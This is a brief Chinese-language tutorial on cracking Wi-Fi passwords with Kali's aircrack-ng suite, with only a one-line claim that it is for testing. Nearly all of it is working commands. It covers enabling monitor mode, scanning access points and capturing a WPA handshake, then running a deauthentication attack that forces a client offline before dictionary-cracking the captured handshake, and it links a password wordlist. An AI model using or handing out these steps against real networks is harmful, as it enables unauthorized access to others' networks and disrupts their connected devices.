利用 kali 破解无线教程

注：此教程只用于测试演示

# 查看网卡信息
airmon-ng

# 网卡开启监听模式
airmon-ng start wlan0

# 查看监听模式是否开启成功
iwconfig

# 扫描热点信息
airodump-ng wlan0mon

# 抓取握手包
airodump-ng -c {CH} --bssid {BSSID} -w {要保存握手包的目录}”
输入：airodump-ng -c 11 --bssid xx:xx:xx:xx:xx:xx -w /home/ wlan0mon

#系统会下线，然后重新连接，然后我们就可以抓到握手包
aireplay-ng -0 {发送反认证包的个数} -a {BSSID} -c {强制下线的MAC地址（STATION下面的地址）} 无线网卡名称
输入“aireplay-ng -0 10 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy wlan0mon

# 使用aircrack-ng进行破解
aircrack-ng -w {本地的字典文件（破解的关键）} {握手包}
默认字典文件在/usr/share/wordlists下
输入"aircrack-ng -w top3000.txt /home/-01.cap"

# 字典文件
字典网上有好多，这个是github上的:https://github.com/conwnet/wpa-dictionary